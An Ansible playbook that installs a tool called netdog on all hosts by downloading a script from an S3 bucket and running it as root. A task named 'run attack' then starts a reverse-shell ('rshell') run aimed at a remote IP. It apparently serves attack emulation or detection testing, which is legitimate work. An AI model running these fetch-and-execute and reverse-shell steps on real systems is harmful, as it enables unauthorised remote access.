- hosts: all
  gather_facts: false
  tasks:
  - name: download netdog installer
    ansible.builtin.get_url:
      url: https://detc-netdog-artifacts.s3.amazonaws.com/install.sh
      dest: /tmp/netdog.sh
      mode: '0700'
  - name: install netdog
    become: true
    shell: "bash /tmp/netdog.sh"
  - name: place netdog input
    ansible.builtin.copy:
      src: ../netdog/instance-discovery-rshell.yml
      dest: instance-discovery-rshell.yml
  - name: run attack
    become: true
    shell: "netdog rshell -p 5555 -o /var/tmp -d -i ./instance-discovery-rshell.yml"
    environment:
      AUTH_TOKEN: "{{ auth_token }}"
      APP_URL: "{{ app_url }}"
      REMOTE_IP: "{{ remote_ip }}"


